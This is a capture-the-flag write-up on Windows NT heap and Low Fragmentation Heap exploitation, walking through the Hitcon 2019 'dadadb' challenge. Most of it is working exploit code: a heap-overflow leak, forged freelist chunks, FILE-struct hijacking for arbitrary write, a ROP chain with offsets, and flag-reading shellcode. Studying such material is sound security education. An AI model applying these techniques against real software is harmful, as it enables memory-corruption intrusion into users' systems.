Windows Heap Exploitation - From Heap Overflow to Arbitrary R/W


banner

TLDR

I was unable to find some good writeups/blogposts on Windows user mode heap exploitation which inspired me to write an introductory but practical post on Windows heap internals and exploitation. I cover the basics of Low Fragmentation Heap, Heap Overflow Attack, and File Struct Exploitation in Windows. Kudos to Angelboy for authoring the great challenge, “dadadb” which we’ll be using as a learning example.


A Primer on Windows Heap Internals

The Windows Heap is divided into the following.

mem_alloc

  • NT Heap

    • Exists since early versions of Windows NT.
    • The default heap implementation up through Windows 7/8.
  • Segment Heap

    • Introduced in Windows 10 as the modern heap manager.
    • Default for apps built with the Universal Windows Platform (UWP), Microsoft Edge, and newer apps.

We’ll talk about the NT Heap here for our challenge. Further Nt Heap is divided into BackEnd and FrontEnd Allocators and have the following differences :

  • FrontEnd Allocator
    • Handles small allocations (usually < 16 KB)
    • Uses the Low Fragmentation Heap (aka LFH, we’ll talk about this)
    • Used for faster allocations/frees where performance is the priority.
  • BackEnd Allocator
    • Handles large allocations
    • Core allocator responsible for demanding memory from OS.

Low Fragmentation Heap (LFH)

backend_frontend

Now we need to have a basic understanding of LFH for our usecase.

  • LFH was made for performance as it takes into account the common size allocations and allocates them efficiently.
  • Low Fragmentation“ also comes from the fact that there is no consolidation and coalescing of chunks if they are allocated or freed.
  • It serves the allocations using a pool instead of requesting backend everytime. The chunks are located in the memory within a struct named UserBlock, which is simply a collection of pages which are broken into pieces of the same size.
  • It only gets triggered if we allocate 18 subsequent allocations of a similar small size.
  • The maximum chunk size LFH handles is ~16 KB (0x4000). Anything larger than that bypasses LFH and goes to the NT heap backend.

Default Process Heap V/S Private Heap

heap_type

The windows heap is also divided into how the heap is initialised for the process.

Default Process Heap

Functions like malloc, new, and HeapAlloc(GetProcessHeap(), ...) usually allocate from this heap unless otherwise specified.

1
2
3
4
5
6
7
typedef struct _PEB {
...
PVOID ProcessHeap; // Default heap (same as GetProcessHeap())
ULONG NumberOfHeaps;
PVOID* ProcessHeaps; // Array of heap handles
...
} PEB, *PPEB;
1
2
3
HANDLE GetProcessHeap() {
return NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap;
}

Private Heap

Created explicitly by a process using:

1
2
3
4
HANDLE customHeap = HeapCreate(0, 0, 0);
void* mem = HeapAlloc(customHeap, 0, 1024);
HeapFree(customHeap, 0, mem);
HeapDestroy(customHeap);

I guess its time to hop onto our challenge now! 🤓


Inital Analysis

This challenge was named “dadadb“ and is from Hitcon 2019 Quals. It should be run on Windows Server 2019 x64 as specified by the author.
Here is a sample run of the application for your reference.

dadadb demo

It looks like a database like program which allows us to add, update and remove a record.
The record structure looks like the following.

1
2
3
4
5
6
struct record{
char* data;
size_t size;
char key[0x41];
struct record* next;
};

There seems to be a login feature to manage different users as well. The program reads the user.txt within the same directory which includes the username and password combination as follows.

1
2
3
4
#user.txt
orange:godlike
ddaa:phdphd
...

So to summarise the functionalities of the program include :

  1. Login (If Successful)
    1. Add Record
      • Searches the database for the record by key, if not available add it. Also used to update a previous record data.
    2. Remove Record
      • Removes an existing record by its key.
    3. View Record
      • View the Data in a specific record.
    4. Exit
  2. Exit

The Vulnerability

So the vulnerability exists in the add/update function where it re-uses the previous size of the record to read the new data

vuln_ida

It could lead to a heap overflow attack if the same record is updated with the new size of data is less than its old size. Also it doesn’t assign the new updated size of the record to target->size, which is used while using the VIEW feature. We could abuse this to gain arbitrary read as well :)

If you’ll notice carefully our program creates a private heap where it stores all the records.

heapcreate

We’ll need to use LFH to exploit it for the following reasons :

  • The location of a chunk allocated by LFH is more deterministic
  • There are less safety checks in LFH as compared to the private heap as it is made for performance.

Arbitrary Read

As I said earlier we need to activate the LFH by subsequently making 18 similar allocations. Since LFH is now activated we need to fill the UserBlock.

1
2
3
4
for i in range(19):
add(f'LFH_{i}', 0x90, 'LFH')
for i in range(0x10):
add(f'record_{i}', 0x90, 'LFH')

We’ll now create a hole using the remove feature. This time we’ll reuse and update an existing record and if we request for an allocation of size equal to the size of our record structure ie. (0x60 bytes) we’ll get the same chunk and write some data into it. The userblock layout will look somewhat like this after these steps.

userblocks

We write the following code to do it.

1
2
3
4
remove('record_0')
add('record_1', 0x60, 'A'*0x60)
#now viewing it leaks the information about the chunk below it 💀
view('record_1')

Afterwards we could also overflow this data buffer to overwrite the data pointer of the next record structure in memory and use the VIEW feature to finally gain arbitrary read. 🙌

struct_overflow

1
2
3
4
def leak(addr):
add(b'fill_1', 0x60, b'A' * 0x70 + p64(addr))
view(next_record)
return u64(proc.recv(8))

We need to leak the following :

  • Heap Base Address
    Using the arbitrary leak we could easily get the Data pointer and therefore the heap base address.

  • ntdll Base Address
    There exists a lock variable in the Heap structure at an offset ie. 0x2c0 which could help to leak ntdll base address.
    lock_var
    You could refer the following to verify. We could also confirm this via the !address command to check which module does this lie in.
    lock_var_detailed

  • PEB
    Fortunately there exists a pointer to PEB’s TlsExpansionBitmapBits member inside ntdll. We could grab its offset to leak PEB as well.

  • Stack Limit from TEB
    Usually the TEB for the specific thread is at PEB_addr + 0x1000
    teb_stacklimit

  • PEBLdr
    We can easily get it from PEB as its at the 0x18 offset.

  • InLoadOrderModuleList
    Its at 0x10 offset in PEBLdr.
    ldrlist

  • Binary Base
    Its the first member in the InLoadOrderModuleList.

  • Kernel32 Base Address (Get Address of CreateFile, ReadFile & WriteFile)
    We’ll need to call these WinAPIs in our rop chain. We could also get it from the InLoadOrderModuleList as well but it is quite easier to just make use of the challenge binary’s Import Address Table to get some specific WinAPI offset for eg. ReadFile and then later calculate its offset from base.

  • Process Parameters (stdout)
    Process Parameters is a member of PEB which contains the handle to our process stdout (we’ll eventually need this later).

Finding Return Address on Stack

Now we could use the stack limit from the TEB to scan for the return address location in stack. We could try overwriting the return address of a write call used in the View feature.

ret_addr_view

We could also add some seed to stack limit to land near the return address.

1
2
3
4
5
6
7
8
9
10
11
12
target = bin_base + 0x1b60
ret_addr = stack_limit + 0x2800
found = False
for i in range(0x1000 // 8):
val_addr = leak(ret_addr)
print(i, hex(ret_addr), hex(val_addr))
if val_addr == target:
print('Found return address')
found = True
break
ret_addr += 8
assert found

Arbitrary Write

Now all we need is to overwrite the return address in stack but we need an arbitrary write primitive to do that. For that we need to take a look at the heap chunk structure in windows. The chunk header is 16 bytes and the free chunk includes two pointers, FLink and BLink which point to other free chunks in the freelist.

chunk_structure

If you’ll observe carefully we’ve the following pointers in the data section. What if we could overwrite that File Stream pointer and use File Struct exploitation to gain arbitrary write? HUH! Sounds interesting right? Lets try to forge fake chunks and overwrite these pointers. :)

bss_layout

First, we need to create a heap layout in memory with some holes as follows.

free_BD

This could be done in the following manner.

1
2
3
4
5
6
7
add(b'A', 0x400, b'AAAA' * 8)
add(b'A', 0x100, b'AAAA' * 8)
add(b'B', 0x100, b'BBBB' * 8)
add(b'C', 0x100, b'CCCC' * 8)
add(b'D', 0x100, b'DDDD' * 8)
remove(b'D')
remove(b'B')

now if we view A we could leak the following:

  • B’s Flink and Blink
  • D’s Flink and Blink
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    proc.recv(0x100) # recv all A data
    fake_chunk_header = proc.recv(0x10) # recv B header which is 16 bytes
    # now get B's FLink and BLink
    B_flink = u64(proc.recv(8)) # the FLink should point to D
    B_blink = u64(proc.recv(8))
    proc.recv(0x100 + 0x110) # skip B's data, C's data and D's header
    # now get B's FLink and BLink
    D_flink = u64(proc.recv(8))
    D_blink = u64(proc.recv(8))
    B_addr = D_blink
    We could now unlink D from B and link the password and username fake chunks to B instead. This could be done in the following manner.
1
2
3
4
5
6
7
8
9
10
11
pass_adr = bin_base + 0x5648
user_adr = bin_base + 0x5620
add(b'A', 0x100, b'A' * 0x100 + fake_chunk_header + p64(pass_adr + 0x10))
logout()
# Freelist : B->fake2(pass)->fake1(user)
fake2 = b'phdphd\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
#the flink is fake chunk at user buf and blink is B chunk
fake2 += p64(user_adr + 0x10) + p64(D_blink)
fake1 = b'ddaa\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
# flink is flink of D and blink is fake chunk at password
fake1 += p64(D_flink) + p64(pass_adr + 0x10)

After creating those fake chunks our freelist looks like following.

freelist

We had to forge two chunks as while unlinking password chunk from the freelist malloc would check for list integrity as :
fd->bk == candidate and bk->fd == candidate
So we the fake chunk at user buff will have the BLink pointing to password which would succeed here.

File Struct Exploitation

Now we could use file struct exploitation here to overwrite the File Stream pointer and get arbitrary write. Lets discuss how :)
The file struct on windows is defined in ucrtbase.dll and looks like the following

1
2
3
4
5
6
7
8
9
10
11
typedef struct _iobuf
{
char* _ptr; // Pointer to next character in buffer.
int _cnt; // Remaining chars in buffer for read/write.
char* _base; // Pointer to start of buffer.
int _flag; // Stream state flags (read/write/error/EOF).
int _file; // CRT file descriptor index.
int _charbuf; // Single-char buffer (e.g., for ungetc).
int _bufsiz; // Size of the buffer in bytes.
char* _tmpfname; // Name of temp file if created, else NULL.
} FILE;

Now we could use this information to craft our own FILE object and overwrite the File Stream pointer sitting just below our fake password chunk.

  • _base
    Memory address which we want to overwrite which is the return address in our case.

  • _file
    File Descriptor of STDIN ie. 0 (which is used to write into the address specified in _base)

  • _flag
    We need to set this to both of the following:

    1
    2
    3
    4
    5
    6
    7
    8
    // (*) USER:     The buffer was allocated by the user and was configured via
    // the setvbuf() function.
    _IOBUFFER_USER = 0x0080,

    // Allocation state bit: When this flag is set it indicates that the stream
    // is currently allocated and in-use. If this flag is not set, it indicates
    // that the stream is free and available for use.
    _IOALLOCATED = 0x2000,
  • _bufsiz
    It should be just more than how many bytes you are planning to write into the address. We’ll keep it 0x200 for now.

The overall code for creating the File Stream object looks like following.

1
2
3
4
5
6
7
8
9
10
11
12
_IOBUFFER_USER = 0x80
_IOALLOCATED = 0x2000

cnt = 0
_ptr = 0
_base = ret_addr
flag = _IOBUFFER_USER | _IOALLOCATED
fd = 0
bufsize = 0x200
obj = p64(_ptr) + p64(_base) + p32(cnt) + p32(flag)
obj += p32(fd) + p32(0) + p64(bufsize) +p64(0)
obj += p64(0xffffffffffffffff) + p32(0xffffffff) + p32(0) + p64(0)*2

Now we need to do a login which in turn will invoke the fread function and our malformed File object would be used then.

If you refer the previous freelist image you’ll notice that B is at the top, therefore we could pop it and write our malformed FILE object into it.

1
add(b'WeGetBChunkHere', 0x100, obj)

Afterwards we’ll get our password chunk for next allocation. And now we could overwrite the address of B chunk(contains our File Object now) to the File Stream pointer as from the layout it is just below it.

1
add(b'WeGetPassChunk', 0x100, b'a' * 0x10 + p64(B_addr))

We managed to successfully overwrite the File Stream pointer! 💪


Constructing our ROP Chain

The No-Child-Process mitigation is turned on for this challenge so we can’t really spawn another process to read the flag and have to write shellcode for reading the flag. We could make use of the Kernel32 APIs we got earlier here.

We will use the ReadFile WinAPI to read our shellcode at a particular address in data section. Afterwards we need to use VirtualProtect to turn that region executable.

Please keep in mind on Windows, WinAPI arguments are passed right-to-left on the stack in x86 (stdcall) and via RCX, RDX, R8, R9 registers with stack for extras in x64 (Microsoft x64 calling convention)

And fortunately we find the perfect gadget in ntdll to fill in these registers.

ntdll_rop_gadget

Now we get offsets of all the required WinApis as well.

1
2
3
4
5
6
pop_rdx_rcx_r8_r9_r10_r11 = ntdll + 0x8fc30
shellcode_addr = program + 0x5000
readfile = kernel32 + 0x22680
virtualprotect = kernel32 + 0x1b680
writefile = kernel32 + 0x22770
createfile = kernel32 + 0x222f0

Our final rop chain looks like the following:

1
2
3
4
5
6
7
buf = p64(pop_rdx_rcx_r8_r9_r10_r11) + p64(shellcode_addr)
buf += p64(stdin) + p64(0x100) +p64(shellcode_addr + 0x100) + p64(10) + p64(11) + p64(readfile)
buf += p64(pop_rdx_rcx_r8_r9_r10_r11) + p64(0x1000) + p64(shellcode_addr)
buf += p64(0x40) + p64(ret_addr + 0x100 - 8) + p64(0) + p64(11)
buf += p64(virtualprotect) + p64(shellcode_addr)
proc.send(buf.ljust(0x100 - 8) + p64(0x4))

Our shellcode for reading the flag would be:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
    jmp getflag
flag:
pop r11
createfile:
mov qword ptr [rsp + 0x30], 0
mov qword ptr [rsp + 0x28], 0x80
mov qword ptr [rsp + 0x20], 3
xor r9, r9
mov r8, 1
mov rdx, 0x80000000
mov rcx, r11
mov rax, {createfile}
call rax
readfile:
mov qword ptr [rsp + 0x20], 0
lea r9, [rsp + 0x200]
mov r8, 0x100
lea rdx, [rsp + 0x100]
mov rcx, rax
mov rax, {readfile}
call rax
writefile:
mov qword ptr [rsp + 0x20], 0
lea r9, [rsp + 0x200]
mov r8, 0x100
lea rdx, [rsp + 0x100]
mov rcx, {stdout}
mov rax, {writefile}
call rax
loop:
jmp loop
getflag:
call flag

Here is our final exploit in action!

final_exp


Final Thoughts

This was a good little exercise for learning the basics. Thanks to my friend @Owl.A for helping me out with my doubts :). I was procastinating a lot so wrote it in a hurry which we’ll help me prepare notes as well, hope you liked it! I’m still deepening my understanding of Windows user‑mode heap internals and exploitation techniques so constructive feedback and corrections are very welcome. If you’d like more deep dives, practical demos, and writeups on heap exploitation, keep an eye on this blog — there’s more coming. 😉

The exploit code could be found here :
mrT4ntr4/Challenge-Solution-Files/HitconQuals_2019_dadadb

References

https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version
https://github.com/scwuaptx/CTF/tree/master/2019-writeup/hitcon/dadadb
https://jackgrence.github.io/HITCON-CTF-2019-dadadb-Writeup/
https://chujdk.github.io/wp/1624.html
https://github.com/peleghd/Windows-10-Exploitation/blob/master/Low_Fragmentation_Heap_(LFH)_Exploitation_-_Windows_10_Userspace_by_Saar_Amar.pdf